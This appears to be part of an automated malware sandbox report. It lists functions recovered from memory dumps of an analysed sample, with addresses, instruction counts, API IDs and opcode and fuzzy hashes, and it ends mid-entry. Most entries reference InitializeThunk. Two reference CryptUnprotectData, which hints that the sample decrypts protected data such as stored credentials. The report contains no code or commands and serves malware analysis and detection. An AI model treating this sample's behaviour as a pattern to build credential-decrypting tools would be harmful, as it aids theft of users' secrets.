                                                • Opcode ID: f9cb3e827baef9e804de8f749d6a884c9a14cd84fc49c758fa0d3f3cd5b98756
                                                • Instruction ID: 9c28319340dfaaf0f609a33b6c069d2444702c635b87bb370f852001699ec313
                                                • Opcode Fuzzy Hash: f9cb3e827baef9e804de8f749d6a884c9a14cd84fc49c758fa0d3f3cd5b98756
                                                • Instruction Fuzzy Hash: 6E530B31D14B198ADB10EF68C884A99F7B1FF99300F11D79AE45977220EB70AAD4CF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A46950, Relevance: 2.5, APIs: 1, Instructions: 963libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: e258ba87de40f673682bb051f7e03d7d49aba667111df456469d3f78cc3aa1c1
                                                • Instruction ID: 6cb9c5d0823558730638bc0da666c0445692921b8a0370ad6959b51945df4394
                                                • Opcode Fuzzy Hash: e258ba87de40f673682bb051f7e03d7d49aba667111df456469d3f78cc3aa1c1
                                                • Instruction Fuzzy Hash: 8AA20574A05228CFCB64DF74C8887ADB7B6BB88305F2085EAD50AA3354DB359E85CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E65868, Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 00E658D5
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156735658980.0000000000E60000.00000040.00000010.sdmp, Offset: 00E60000, based on PE: false
                                                Similarity
                                                • API ID: CryptDataUnprotect
                                                • String ID:
                                                • API String ID: 834300711-0
                                                • Opcode ID: ef30a9325c19c91721b4e26d6e0f882fb7ee466082b65fa8b17ecc28b70da9a7
                                                • Instruction ID: 7130723ff96a523f7f5dd7cb57a5cc41aa896fc78d1684e72059f944f3c0c00a
                                                • Opcode Fuzzy Hash: ef30a9325c19c91721b4e26d6e0f882fb7ee466082b65fa8b17ecc28b70da9a7
                                                • Instruction Fuzzy Hash: 1D1167B6800249AFCF10CF99D845BDEBFF4EF48324F148419E664A7610C338A950DFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E65220, Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 00E658D5
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156735658980.0000000000E60000.00000040.00000010.sdmp, Offset: 00E60000, based on PE: false
                                                Similarity
                                                • API ID: CryptDataUnprotect
                                                • String ID:
                                                • API String ID: 834300711-0
                                                • Opcode ID: 9a6144e16468fd49217fd2e0b0b61cafef10e0da8dc5336b29d95cb57326d048
                                                • Instruction ID: 9e0d3e6bb74e4e8437f6dd0577014203bfe2cc00adc086f9951f913360bd8e6c
                                                • Opcode Fuzzy Hash: 9a6144e16468fd49217fd2e0b0b61cafef10e0da8dc5336b29d95cb57326d048
                                                • Instruction Fuzzy Hash: 961144B68006499FCB10CF99D845BDEBBF4EF88324F108429E654A7650C379A950DFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E2A09B, Relevance: .7, Instructions: 747COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156735429019.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 78515ea4bd431e6579962a2341b10f1494bd7a443924d80c6b25ab4a53f602cd
                                                • Instruction ID: f1f66bdea605665a4ffc7853b02106927059245a87d4139aaab630bcc20a5ac3
                                                • Opcode Fuzzy Hash: 78515ea4bd431e6579962a2341b10f1494bd7a443924d80c6b25ab4a53f602cd
                                                • Instruction Fuzzy Hash: 73621A34E047298BCB24EF78D99479DB7B2AF89304F1185A9D54AAB250EF309D85CF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E27A28, Relevance: .4, Instructions: 402COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156735429019.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 41192993e275a7af915bf31cb1a800d97f4203966cbd22c4eb9fa2682bf7677d
                                                • Instruction ID: e0444a7760e87dfb8bd8fd3cbabb1cefa92393a10c40379ed98cf201ecd18f66
                                                • Opcode Fuzzy Hash: 41192993e275a7af915bf31cb1a800d97f4203966cbd22c4eb9fa2682bf7677d
                                                • Instruction Fuzzy Hash: D5F1A034B042248FDB04DFB8D9846ADBBF2BF88354F258564D815AB395DB35EC42CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A46971, Relevance: 2.1, APIs: 1, Instructions: 637libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8f7dcccfa1bc134a6026acc30d991669464e80e8f4fb58cbbe5783511d1d579e
                                                • Instruction ID: f788bdc95ab463cda701e0a1167410e219fc259f9a2ec505be4e5a4ef1f80a66
                                                • Opcode Fuzzy Hash: 8f7dcccfa1bc134a6026acc30d991669464e80e8f4fb58cbbe5783511d1d579e
                                                • Instruction Fuzzy Hash: FA62F774A05228CFCB64EF74C88869DB7B6BF88305F6081E9D50AA3345DB359E85CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A469B8, Relevance: 2.1, APIs: 1, Instructions: 630libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 32304d1f8baac77c53d31c4d24fd99515ed21540c1b7a541b58030bbe0fe2e2b
                                                • Instruction ID: b8341d4864a16c54e1030c7f2679e177d49556292e9e7e1bb04599854e178af5
                                                • Opcode Fuzzy Hash: 32304d1f8baac77c53d31c4d24fd99515ed21540c1b7a541b58030bbe0fe2e2b
                                                • Instruction Fuzzy Hash: 5662F774A05228CFCB64EF74C8886ADB7B6BF88305F6081E9D50AA3345DB359E85CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A469FF, Relevance: 2.1, APIs: 1, Instructions: 623libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9edd16bbf59ad9e5c706405ec1952e1a8dd686226b3002a8fb0dbed5390afac1
                                                • Instruction ID: 059da9707db7f922a2b7f3ce4a8facc639266ff4bb001a00857c09b7d06d1fb6
                                                • Opcode Fuzzy Hash: 9edd16bbf59ad9e5c706405ec1952e1a8dd686226b3002a8fb0dbed5390afac1
                                                • Instruction Fuzzy Hash: 27520674A05228CFCB64EF74C8886ADB7B6BF88305F6081E9D50AA3345DB359E85CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A46A46, Relevance: 2.1, APIs: 1, Instructions: 616libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: ad666f89a65637599f414bbeba44f4924a84cd188c90be2f189c923a20004b35
                                                • Instruction ID: 286cf62db5c392159ce3e43c629f90f711ea6c5268f2dd11a0e234431bc27eb1
                                                • Opcode Fuzzy Hash: ad666f89a65637599f414bbeba44f4924a84cd188c90be2f189c923a20004b35
                                                • Instruction Fuzzy Hash: 9852F674A05228CFCB64EF74C8886ADB7B6BF88305F6080E9D50AA3345DB359E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A46A8D, Relevance: 2.1, APIs: 1, Instructions: 609libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9eb6021d0b83fc70e3d9a23d6df100c89476b1fb6c950677a3d657cddb61c5f9
                                                • Instruction ID: c06f8e3fba1e3efd505c0e1d737d2b0e8b0837cb5649af1729fe4c3f77d5c40a
                                                • Opcode Fuzzy Hash: 9eb6021d0b83fc70e3d9a23d6df100c89476b1fb6c950677a3d657cddb61c5f9
                                                • Instruction Fuzzy Hash: B652F574A05228CFCB64EF74C8886ADB7B6BF88305F6080E9D50AA3345DB359E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A46AD4, Relevance: 2.1, APIs: 1, Instructions: 602libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 35cdc1f86ae2a209e2bfe7f252745a3cd5689bfc7fb5aac1053b855893b6350d
                                                • Instruction ID: 612effb49f3e3258fbf275ca27de70e5bb1852de60ff113a16cba57876cb616f
                                                • Opcode Fuzzy Hash: 35cdc1f86ae2a209e2bfe7f252745a3cd5689bfc7fb5aac1053b855893b6350d
                                                • Instruction Fuzzy Hash: E052F574A05228CFCB64EF74C8886ADB7B6BF88305F6080E9D50AA3345DB359E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A46B1B, Relevance: 2.1, APIs: 1, Instructions: 595libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c944288b0deb846a813d929be1dbcd2e76aa3b2ea08953e90f225a2fe3fe9039
                                                • Instruction ID: d7fa1c51ba7d2166f544d2159f88ef6e1cab5c2e0f2d2f1d344b43ff4aec6f36
                                                • Opcode Fuzzy Hash: c944288b0deb846a813d929be1dbcd2e76aa3b2ea08953e90f225a2fe3fe9039
                                                • Instruction Fuzzy Hash: CF520574A05228CFCB64EF74C8886ADB7B6BF88305F6080E9D50AA3345DB359E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A46B62, Relevance: 2.1, APIs: 1, Instructions: 588libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 17724d55cc0ef2435892f2d1c41ad64394f46eda157d8d42516b9cde22829513
                                                • Instruction ID: 8f7a81b0f1f886c807ac3419d59be4bed12de38f99cfe930c20269e243ec88c9
                                                • Opcode Fuzzy Hash: 17724d55cc0ef2435892f2d1c41ad64394f46eda157d8d42516b9cde22829513
                                                • Instruction Fuzzy Hash: 4E52F574A05228CFCB64EF74C8886ADB7B6BF88305F6080E9D50AA3345DB359E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A46BA9, Relevance: 2.1, APIs: 1, Instructions: 581libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 87d3b295d33d0ae8d47cc74988805eb312bd31c4d75acc149bd60e7bbb250979
                                                • Instruction ID: c64af9c078de0c32c0e0697a9e48467c2c3a9136b0b51f14ae53886f2ab63c55
                                                • Opcode Fuzzy Hash: 87d3b295d33d0ae8d47cc74988805eb312bd31c4d75acc149bd60e7bbb250979
                                                • Instruction Fuzzy Hash: BF52F474A05228CFCB64EF74C8887ADB7B6BB88305F6080E9D50AA3345DB359E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A46BF0, Relevance: 2.1, APIs: 1, Instructions: 574libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 1448288f59bb3146706a341255a0e2be62a23a3fa0307d5a17fcf5e8f034395b
                                                • Instruction ID: c614eb9370f0eecb84177e07525d25d8f21ef0648866a77483280eff29948e75
                                                • Opcode Fuzzy Hash: 1448288f59bb3146706a341255a0e2be62a23a3fa0307d5a17fcf5e8f034395b
                                                • Instruction Fuzzy Hash: DA42F474A05228CFCB64EF74C8887ADB7B6BB88305F6080E9D50AA3345DB359E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A46C37, Relevance: 2.1, APIs: 1, Instructions: 567libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: ebda7707ac1a0891056b7b600697ba662a52dcffb90c9dd1117f015bf18f6de9
                                                • Instruction ID: 70f41d466b59b22b04d117df2036f170f232f715ad47192c8dbe4bc7ccc12816
                                                • Opcode Fuzzy Hash: ebda7707ac1a0891056b7b600697ba662a52dcffb90c9dd1117f015bf18f6de9
                                                • Instruction Fuzzy Hash: 7442F474A05228CFCB64EF74C8887ADB7B6BB88305F6080E9D50AA3345DB359E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A46C7E, Relevance: 2.1, APIs: 1, Instructions: 560libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 1adf36b206b4e1ecdc994215be6cd671c3cabbe4bd787085f9b7b40fe2867a66
                                                • Instruction ID: 78457e77963c373bf33bf47b0835fbba8b2243126ce6a16666ee19267f558225
                                                • Opcode Fuzzy Hash: 1adf36b206b4e1ecdc994215be6cd671c3cabbe4bd787085f9b7b40fe2867a66
                                                • Instruction Fuzzy Hash: 9B42F474A05228CFCB64EF74C8887ADB7B6BB88305F6080E9D50AA3345DB359E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A46CC5, Relevance: 2.1, APIs: 1, Instructions: 553libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: cbec52c3a3f9d98333d278f119e6f366ad217c586edfeae8980ef77db11d92e3
                                                • Instruction ID: a88624cf0b12b130c4357ec162f9d698250d086c3bd3e280473a0c62bd421c47
                                                • Opcode Fuzzy Hash: cbec52c3a3f9d98333d278f119e6f366ad217c586edfeae8980ef77db11d92e3
                                                • Instruction Fuzzy Hash: 0042F474A05228CFCB64EF74C8887ADB7B6BB88305F6080E9D50AA3345DB359E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A46D0C, Relevance: 2.0, APIs: 1, Instructions: 546libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 0b215d05260e4d7d8e8624f36044b1f1ccd3ab456afb19ec2f211cd1cca25a6d
                                                • Instruction ID: d0411ef8720f6b3a6751ba943ddc4816e3123433d6fb0d754bdbce0fde76d289
                                                • Opcode Fuzzy Hash: 0b215d05260e4d7d8e8624f36044b1f1ccd3ab456afb19ec2f211cd1cca25a6d
                                                • Instruction Fuzzy Hash: 4F42F474A05228CFCB64EF74C8887ADB7B6BB88305F6080E9D50AA3345DB359E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A46D53, Relevance: 2.0, APIs: 1, Instructions: 539libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 1fcf8963a3c5605c3e5ccfab0b69d3e5a46a13ad2eca94d773eafbbcdb33a683
                                                • Instruction ID: b83df03a51ac4c01179a1f7d267c7c0fcee5bffee5004291bbc1cfb7de777c3f
                                                • Opcode Fuzzy Hash: 1fcf8963a3c5605c3e5ccfab0b69d3e5a46a13ad2eca94d773eafbbcdb33a683
                                                • Instruction Fuzzy Hash: F5420474A05228CFCB64EF74C8887ADB7B6BB88305F6080E9D50AA3345DB359E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A46D9A, Relevance: 2.0, APIs: 1, Instructions: 530libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 42bf9c7f96e5f163038ec160d491a7721a4b05422c571d3e99c1425a9e52aeff
                                                • Instruction ID: 92b2cb354b54e780c5c84cf2f96cc725e510128f5337cfb56bf28cf62965e47f
                                                • Opcode Fuzzy Hash: 42bf9c7f96e5f163038ec160d491a7721a4b05422c571d3e99c1425a9e52aeff
                                                • Instruction Fuzzy Hash: 20420474A05228CFCB64EF74C8887ADB7B6BB88305F6080E9D50AA3345DB359E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A46DD8, Relevance: 2.0, APIs: 1, Instructions: 523libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d75683f5396676f88d4dd0a52ab5cf9d341102b01d281955a59f1c2a16992bad
                                                • Instruction ID: 25192f83c408e68c19bb8cf6afc702064f55cffb38deed048133dc6608285e75
                                                • Opcode Fuzzy Hash: d75683f5396676f88d4dd0a52ab5cf9d341102b01d281955a59f1c2a16992bad
                                                • Instruction Fuzzy Hash: DB320474A05228CFCB64EF74C8887ADB7B6BB88305F6080E9D50AA3345DB359E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A46E16, Relevance: 2.0, APIs: 1, Instructions: 518libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 975e610411c3e0ad341ea4160c3cae427b5f85663880706ef4c9ad8f6931681e
                                                • Instruction ID: 3eaebd861743c4c215c0ed23c3ca5a5d21d999efa6cd804fbc8ed28bc73aadcc
                                                • Opcode Fuzzy Hash: 975e610411c3e0ad341ea4160c3cae427b5f85663880706ef4c9ad8f6931681e
                                                • Instruction Fuzzy Hash: 4132F474A05228CFCB64EF74C8887ADB7B6BB88305F6080E9D50AA3345DB359E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A46E5D, Relevance: 2.0, APIs: 1, Instructions: 509libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: f5050eef22a391e27e878955f0cf7c83bd14a573fdd4cae667dfb416dcb6e49a
                                                • Instruction ID: bbb784bbd4fe847cf0c7dfbc5c2f58c082604fd35b4b6363be4581fd28878229
                                                • Opcode Fuzzy Hash: f5050eef22a391e27e878955f0cf7c83bd14a573fdd4cae667dfb416dcb6e49a
                                                • Instruction Fuzzy Hash: B0320474A05228CFCB64EF74C8887ADB7B6BB88305F6080E9D50AA3345DB359E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A46E9B, Relevance: 2.0, APIs: 1, Instructions: 504libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: f14e2543c72b2643447087133041711fad44fdf6505f87188ab7b0f02c5cc3ac
                                                • Instruction ID: ea2d421e6e5ee4b77d5a8dc964f1fce727356cd77b736af2644bc829558534c9
                                                • Opcode Fuzzy Hash: f14e2543c72b2643447087133041711fad44fdf6505f87188ab7b0f02c5cc3ac
                                                • Instruction Fuzzy Hash: 42320474A05228CFCB64EF74C8887ADB7B6BB88305F6080E9D50AA3345DB359E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A46EE2, Relevance: 2.0, APIs: 1, Instructions: 497libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: f8de04ba3d5443927246576c16edb55544ef0416fe032ce5ae5e595d874c9448
                                                • Instruction ID: e7a8b8db5b582088872cdb5ad722da832828046f9664c1cd55c5a0e783977a48
                                                • Opcode Fuzzy Hash: f8de04ba3d5443927246576c16edb55544ef0416fe032ce5ae5e595d874c9448
                                                • Instruction Fuzzy Hash: 66320574A05228CFCB64EF74C8887ADB7B6BB88305F6080E9D50AA3345DB359E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A46F29, Relevance: 2.0, APIs: 1, Instructions: 490libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 08259c21a50b061829e2fd7be65fe9c07506febd278a6e0f1680be5cb7e8b0ce
                                                • Instruction ID: bce4e0bffcbb8d2356b5146527df21b5718992bc1b9836870de62d4d1109a31e
                                                • Opcode Fuzzy Hash: 08259c21a50b061829e2fd7be65fe9c07506febd278a6e0f1680be5cb7e8b0ce
                                                • Instruction Fuzzy Hash: A6320574A05228CFCB64EF74C8887ADB7B6BB88305F6080E9D50AA3345DB359E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A46F70, Relevance: 2.0, APIs: 1, Instructions: 481libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 676bf7a53b59a07f58bd6cbaaafbc7245349af6efda2f0840831d9006bd0ea43
                                                • Instruction ID: c050777a7a228fa6870b6b8a071f5f724ae0f17f182b24a596fcc197229de84e
                                                • Opcode Fuzzy Hash: 676bf7a53b59a07f58bd6cbaaafbc7245349af6efda2f0840831d9006bd0ea43
                                                • Instruction Fuzzy Hash: 4D221674A04228CFCB64EF74C8887ADB7B6BB88305F6080E9D50AA3345DB359E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A46FAE, Relevance: 2.0, APIs: 1, Instructions: 476libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3f350e1796581a5ee7ba6a4179ee26d67c4b3ee6dc3c90f851a065b25595474c
                                                • Instruction ID: 764160bc4dec817044f76692320be4e49902b534931b85dcec04c5988cd13759
                                                • Opcode Fuzzy Hash: 3f350e1796581a5ee7ba6a4179ee26d67c4b3ee6dc3c90f851a065b25595474c
                                                • Instruction Fuzzy Hash: 66221674A04228CFCB64EF74C8887ADB7B6AF88305F6084E9D50AA3345DB359E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A46FF5, Relevance: 2.0, APIs: 1, Instructions: 469libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 09ae663d1f369674ff07b23bdc4a4b9aa455731163025b98dfb8390d589ac364
                                                • Instruction ID: 63a7d64260ca32ac26fdbbf04bf40419b985da9788ee737316a613456019b72a
                                                • Opcode Fuzzy Hash: 09ae663d1f369674ff07b23bdc4a4b9aa455731163025b98dfb8390d589ac364
                                                • Instruction Fuzzy Hash: 8E221674A04228CFCB64EF74C8887ADB7B6BB88305F6080E9D50AA3345DB349E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A4703C, Relevance: 2.0, APIs: 1, Instructions: 462libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3b6d1a43500a0fc3fd707d976c65fc48cfea653735289c773087dee36289257e
                                                • Instruction ID: 0995395ed4e36eb0a6f96da9a18486a0dee95795f5957c5a36e242fa27a3f141
                                                • Opcode Fuzzy Hash: 3b6d1a43500a0fc3fd707d976c65fc48cfea653735289c773087dee36289257e
                                                • Instruction Fuzzy Hash: F1221774A04228CFCB64EF74C8887ADB7B6AF88305F6085E9D50AA3345DB349E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A47083, Relevance: 2.0, APIs: 1, Instructions: 455libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 62dff6229ea524d383cbb84f57d47a5640a083a5c47dc6dd41d0921803d630ff
                                                • Instruction ID: 7ed9efe53dd610337b794009085139c09ccd9164ffe6ab37c6047ca61961c796
                                                • Opcode Fuzzy Hash: 62dff6229ea524d383cbb84f57d47a5640a083a5c47dc6dd41d0921803d630ff
                                                • Instruction Fuzzy Hash: D7221874A04229CFCB64EF74C8887ADB7B6AF88305F6085E9D50AA3341DB349E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A470CD, Relevance: 1.9, APIs: 1, Instructions: 448libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3f6d1bb88e5446bb06ef4cbb522ce03b12a453c4557f5b28ab246edc9cb2be09
